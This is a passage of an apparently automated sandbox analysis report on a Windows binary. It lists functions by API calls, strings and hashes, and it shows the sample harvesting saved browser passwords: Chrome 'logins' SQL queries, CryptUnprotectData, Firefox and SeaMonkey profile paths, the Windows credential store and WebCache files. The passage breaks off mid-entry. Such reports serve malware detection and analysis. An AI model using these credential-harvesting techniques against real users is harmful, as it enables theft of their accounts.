Opcode Fuzzy Hash: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
Instruction Fuzzy Hash: 5201E874940B44EFEB306F71CD09E07BAE4EF94B117118D2EE49A92A10D778E818CE54

Uniqueness

Uniqueness Score: -1.00%

Function 0040299E, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 250fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004029C4
CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004029DB
CopyFileW.KERNEL32(?,?,00000000), ref: 004029FC
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402A07
memset.MSVCRT ref: 00402A20
DeleteFileW.KERNEL32(?), ref: 00402C96

Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
Part of subcall function 004080FD: GetTempFileNameW.KERNEL32(?,004029F6,00000000,?), ref: 0040813D

memset.MSVCRT ref: 00402A95

Part of subcall function 00408C93: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,000003FF,000003FF,00402B19,?,?,000003FF,00000000), ref: 00408CA5

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00402B6E

Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD

memset.MSVCRT ref: 00402BF7
memcpy.MSVCRT ref: 00402C0A
MultiByteToWideChar.KERNEL32 ref: 00402C31
LocalFree.KERNEL32(?), ref: 00402C3A

Strings

SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402A61
chp, xrefs: 004029E6

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Filememset$ByteCharMultiWide$FreeLibraryTemp$AddressChangeCloseCopyCreateDeleteDirectoryFindLoadLocalNameNotificationPathProcWindowsmemcpy
String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
API String ID: 1340729801-1844170479
Opcode ID: 847b02111c32181764201ef2763939648a1449b727fd7f1631cfcf71ce955560
Instruction ID: 12325825b01e7d439ee1a457c4e284e7a4c6ca08c5b0c0223ff6c3e9a84d8d63
Opcode Fuzzy Hash: 847b02111c32181764201ef2763939648a1449b727fd7f1631cfcf71ce955560
Instruction Fuzzy Hash: 61819172D00128ABDB11EBA5DC85AEE7778EF44314F1404BAF618F7291DB785F448B68

Uniqueness

Uniqueness Score: -1.00%

Function 00413424, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413442
memset.MSVCRT ref: 00413457
Process32FirstW.KERNEL32(?,?), ref: 00413473
OpenProcess.KERNEL32(00000410,00000000,?,00000000,?,?), ref: 004134B8
memset.MSVCRT ref: 004134DF
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413514
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0041352E
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 0041354F
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00413580
free.MSVCRT(-00000028), ref: 00413599
Process32NextW.KERNEL32(?,0000022C), ref: 004135E2
CloseHandle.KERNEL32(?,?,0000022C), ref: 004135F2

Strings

QueryFullProcessImageNameW, xrefs: 0041351E
kernel32.dll, xrefs: 0041350F

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 3536422406-1740548384
Opcode ID: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
Instruction ID: 336025cd3e57628a03d53de68a5eb917573850932ab3a304507e713d781e6372
Opcode Fuzzy Hash: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
Instruction Fuzzy Hash: 3E518CB2C00118ABDB10DFA5DC84ADEF7B9AF95301F1040ABE508A3251DB799B84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00409A23, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040978A: memset.MSVCRT ref: 004097B2
Part of subcall function 0040978A: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
Part of subcall function 0040978A: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
Part of subcall function 0040978A: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
Part of subcall function 0040978A: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
Part of subcall function 0040978A: _wcsicmp.MSVCRT ref: 004098B7

Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542

OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00409AC4
GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9

Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
Part of subcall function 004080FD: GetTempFileNameW.KERNEL32(?,004029F6,00000000,?), ref: 0040813D

Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6

CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
WriteFile.KERNEL32(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
CloseHandle.KERNEL32(?), ref: 00409B43
CloseHandle.KERNEL32(?), ref: 00409B48
CloseHandle.KERNEL32(00000000), ref: 00409B4D
CloseHandle.KERNEL32(00000000), ref: 00409B52

Strings

bhv, xrefs: 00409AE2
Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409A29

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
API String ID: 3399910952-4002013007
Opcode ID: 3fa90e5644c1a4fc50ce3e3b894dc2718032181f1a1f1c2f7d5b065935081985
Instruction ID: fb70aa460989ca239fd235d66d785af6871ae45b3eb53ae5652ba3f6cf74083a
Opcode Fuzzy Hash: 3fa90e5644c1a4fc50ce3e3b894dc2718032181f1a1f1c2f7d5b065935081985
Instruction Fuzzy Hash: B9411776900118BBCF119FA5DC499DFBFB9FF09760F108066F604A6252C7749E40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00410D36, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410D59
memset.MSVCRT ref: 00410D6E
memset.MSVCRT ref: 00410D83
memset.MSVCRT ref: 00410D98
memset.MSVCRT ref: 00410DAD

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626

wcslen.MSVCRT ref: 00410DD3
wcslen.MSVCRT ref: 00410DE4
wcslen.MSVCRT ref: 00410E1C
wcslen.MSVCRT ref: 00410E2A
wcslen.MSVCRT ref: 00410E63
wcslen.MSVCRT ref: 00410E71
memset.MSVCRT ref: 00410EF7

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Mozilla\SeaMonkey, xrefs: 00410E5E, 00410E89
Mozilla\SeaMonkey\Profiles, xrefs: 00410DCE, 00410DFB, 00410E17, 00410E42

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
API String ID: 2775653040-2068335096
Opcode ID: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
Instruction ID: 4a87cbf5aa2277a33565dd90cff8ebe3000d96c1f720339e2901549eb91f8fd8
Opcode Fuzzy Hash: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
Instruction Fuzzy Hash: 8451517254121C66DB20E762DD86FCE737C9F85314F1104ABE108E6142EFB99AC4CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00410F47, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410F6A
memset.MSVCRT ref: 00410F7F
memset.MSVCRT ref: 00410F94
memset.MSVCRT ref: 00410FA9
memset.MSVCRT ref: 00410FBE

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626

wcslen.MSVCRT ref: 00410FE4
wcslen.MSVCRT ref: 00410FF5
wcslen.MSVCRT ref: 0041102D
wcslen.MSVCRT ref: 0041103B
wcslen.MSVCRT ref: 00411074
wcslen.MSVCRT ref: 00411082
memset.MSVCRT ref: 00411108

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Mozilla\Firefox\Profiles, xrefs: 00410FDF, 0041100C, 00411028, 00411053
Mozilla\Firefox, xrefs: 0041106F, 0041109A

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
API String ID: 2775653040-3369679110
Opcode ID: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
Instruction ID: 71a9fb945579d4cb0336c6bc71926503c314de5bf88e5d97c60d5b36565dc427
Opcode Fuzzy Hash: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
Instruction Fuzzy Hash: C3515E729012186ADB20EB51DD86FCF77BD9F85304F1140ABE208E2152EF799BC88B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00413627, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676

Strings

psapi.dll, xrefs: 0041362D
GetModuleInformation, xrefs: 0041366C
EnumProcesses, xrefs: 00413660
GetModuleFileNameExW, xrefs: 00413654
EnumProcessModules, xrefs: 00413648
GetModuleBaseNameW, xrefs: 0041363E

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2238633743-70141382
Opcode ID: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
Instruction ID: f29cbade6603fc4a2ab0b3c2c5315d136f5cdb5c857cdf3d96e229ab99d62a04
Opcode Fuzzy Hash: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
Instruction Fuzzy Hash: 07F0B774940784ABDB316F759C09E06BEE0EFA8701721491EE1C153A54D779E040CF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040956D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00403B29: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
Part of subcall function 00403B29: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F

CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
wcslen.MSVCRT ref: 004095CC
wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
memset.MSVCRT ref: 00409679
memcpy.MSVCRT ref: 0040969A
_wcsnicmp.MSVCRT ref: 004096DF
wcschr.MSVCRT ref: 00409707
LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 0040972B

Strings

J, xrefs: 0040964A
Microsoft_WinInet_, xrefs: 004096D9
Microsoft_WinInet, xrefs: 004095BE

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
String ID: J$Microsoft_WinInet$Microsoft_WinInet_
API String ID: 1313344744-1864008983
Opcode ID: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
Instruction ID: ea1b4f48df4bf11ab27dc332c663e5edf47b9e63c97f7d7fc3a34612be846c77
Opcode Fuzzy Hash: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
Instruction Fuzzy Hash: A5511AB1D00209AFDF20DFA5C885AAEB7B8FF08304F14446AE919E7242D738AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044472E, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,004454C0,00000070), ref: 0044473D
__set_app_type.MSVCRT ref: 0044479C
__p__fmode.MSVCRT ref: 004447B1
__p__commode.MSVCRT ref: 004447BF
__setusermatherr.MSVCRT ref: 004447EB
_initterm.MSVCRT ref: 00444801
__wgetmainargs.KERNELBASE ref: 00444824
_initterm.MSVCRT ref: 00444837
GetStartupInfoW.KERNEL32(?), ref: 00444894
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004448BA
exit.KERNELBASE ref: 004448D1
_cexit.MSVCRT ref: 004448D7

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
Instruction ID: 3deb3861b6046dda02d7dc4087396bab8fe4faf5ffc7b91e65a4640001166331
Opcode Fuzzy Hash: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
Instruction Fuzzy Hash: 3A51C279C00704DFEB30AFA5D8487AE77B4FB86711F20412BF451A7292D7788882CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A420, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A444

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A015
Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A02D
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A049
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A058
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A09F
Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A0AE

Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542

FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
wcschr.MSVCRT ref: 0040A4D0
wcschr.MSVCRT ref: 0040A4F0
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
GetLastError.KERNEL32 ref: 0040A51F
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A54B
FindCloseUrlCache.WININET(?), ref: 0040A55C

Strings

visited:, xrefs: 0040A4B4

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
String ID: visited:
API String ID: 615219573-1702587658
Opcode ID: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
Instruction ID: a8741c9f70935d188a110af9e9e8f96ccbc1ec5a4ffe9cc29b4dc234b75738c1
Opcode Fuzzy Hash: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
Instruction Fuzzy Hash: 5F419F72900219BBDB10EFA5DC85AAEBBB8FF44754F10406AE504F3281DB789E51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A94C, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA

Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25

Part of subcall function 0040A420: memset.MSVCRT ref: 0040A444
Part of subcall function 0040A420: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4D0
Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4F0
Part of subcall function 0040A420: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
Part of subcall function 0040A420: GetLastError.KERNEL32 ref: 0040A51F

Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A5DF
Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 0040A60D
Part of subcall function 0040A56F: _wcsupr.MSVCRT ref: 0040A627
Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A676
Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 0040A6A1

Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85

_wcslwr.MSVCRT ref: 0040AA14
wcslen.MSVCRT ref: 0040AA29

Strings

https://login.yahoo.com/config/login, xrefs: 0040A9A8
/, xrefs: 0040AA49
http://www.facebook.com/, xrefs: 0040A99B
/, xrefs: 0040AA35
https://www.google.com/accounts/servicelogin, xrefs: 0040A98E

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
API String ID: 4091582287-4196376884
Opcode ID: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
Instruction ID: e8c4dab73010a582bcb55339b064a6b15101daee4fa053d2547f161988c3f8ed
Opcode Fuzzy Hash: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
Instruction Fuzzy Hash: C731D272700204AADB20BB6ACD41A9F7669EF80344F25087FB844FB1C6DB78DD91D699

Uniqueness

Uniqueness Score: -1.00%

Function 00409FF2, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A015
memset.MSVCRT ref: 0040A02D

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

wcslen.MSVCRT ref: 0040A049
wcslen.MSVCRT ref: 0040A058
wcslen.MSVCRT ref: 0040A09F
wcslen.MSVCRT ref: 0040A0AE

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040A09A, 0040A0C2
Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040A043, 0040A048, 0040A071

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
API String ID: 2036768262-2114579845
Opcode ID: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
Instruction ID: e8ec88334da27b7df1bd19bf5f92620076e348809ddf91dc3f5a530f518c7d73
Opcode Fuzzy Hash: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
Instruction Fuzzy Hash: F121A9B254021C55DB20E691DC85EDB73BCAF54314F5104BFF615E2081EBB8DA84465D

Uniqueness

Uniqueness Score: -1.00%

Function 0044376F, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00443820

Strings

temp, xrefs: 00443962
no such vfs: %s, xrefs: 0044386A
NOCASE, xrefs: 004438E3
main, xrefs: 00443952
RTRIM, xrefs: 004438B2
BINARY, xrefs: 00443889, 0044388E, 0044389A, 004438A6, 004438CB

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
API String ID: 3510742995-2641926074
Opcode ID: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
Instruction ID: 2a909f6aa8b78d8aa74dd045bbec2887fe81728cdb5ed6237a850f532ee9234f
Opcode Fuzzy Hash: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
Instruction Fuzzy Hash: 5A711CB1600201BFF310AF1ADC82B5AB798BB44719F15452FF45897782C7BDE9908B99

Uniqueness

Uniqueness Score: -1.00%

Function 00410A52, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00410C87: memset.MSVCRT ref: 00410CA3
Part of subcall function 00410C87: memset.MSVCRT ref: 00410CB8
Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410CE1
Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410D0A

memset.MSVCRT ref: 00410A9A
wcslen.MSVCRT ref: 00410AB1
wcslen.MSVCRT ref: 00410AB9
wcslen.MSVCRT ref: 00410B14
wcslen.MSVCRT ref: 00410B22

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

places.sqlite, xrefs: 00410B1B, 00410B30
history.dat, xrefs: 00410A7A, 00410AB6, 00410AC8

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memsetwcscat$wcscpy
String ID: history.dat$places.sqlite
API String ID: 2541527827-467022611
Opcode ID: c2985aa8b704297109810192aa09eefcc2eb1dcc6c122f6f24f6b4785e23aec6
Instruction ID: 16c00ee82f17989474e920b03892a6de4e18c3fe0141c7e4295d5dc86641310b
Opcode Fuzzy Hash: c2985aa8b704297109810192aa09eefcc2eb1dcc6c122f6f24f6b4785e23aec6
Instruction Fuzzy Hash: 17314571D041189ADF10EBA5DC89ACDB3B8AF50319F20457FE554F2182EB7C9A84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00411CDB, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411CFD
wcslen.MSVCRT ref: 00411D08
wcslen.MSVCRT ref: 00411D16
wcslen.MSVCRT ref: 00411D6C
wcslen.MSVCRT ref: 00411D7A

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Login Data, xrefs: 00411D72, 00411D77, 00411D88
Web Data, xrefs: 00411D0E, 00411D13, 00411D29

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memsetwcscatwcscpy
String ID: Login Data$Web Data
API String ID: 3932597654-4228647177
Opcode ID: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
Instruction ID: 9a91d2e82c236d30763d7b9ebcc1a6cccb69c4478b10b945406aecd22e6d63c1
Opcode Fuzzy Hash: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
Instruction Fuzzy Hash: 46218B7250411C6ADB10EB55EC89FDA73ACAF50328F14487FF518E3191EBBCDAC44658

Uniqueness

Uniqueness Score: -1.00%

Function 00417C9A, Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,-7FBE8982,00000003,00000000,?,?,00000000), ref: 00417D72
CreateFileA.KERNEL32(?,-7FBE8982,00000003,00000000,004175FE,004175FE,00000000), ref: 00417D8A
GetLastError.KERNEL32 ref: 00417D99
free.MSVCRT(?), ref: 00417DA6

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile$ErrorLastfree
String ID:
API String ID: 77810686-0
Opcode ID: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
Instruction ID: 35fec4397722218e6507e77f53b50855b574b2e4c8baf302a97b237cc2aa3bd3
Opcode Fuzzy Hash: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
Instruction Fuzzy Hash: D841F27150C3059FEB20CF25EC4179BBBF4EF84314F10892EF89592291D738DA848B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC4E, Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON

Download Yara Rule

APIs

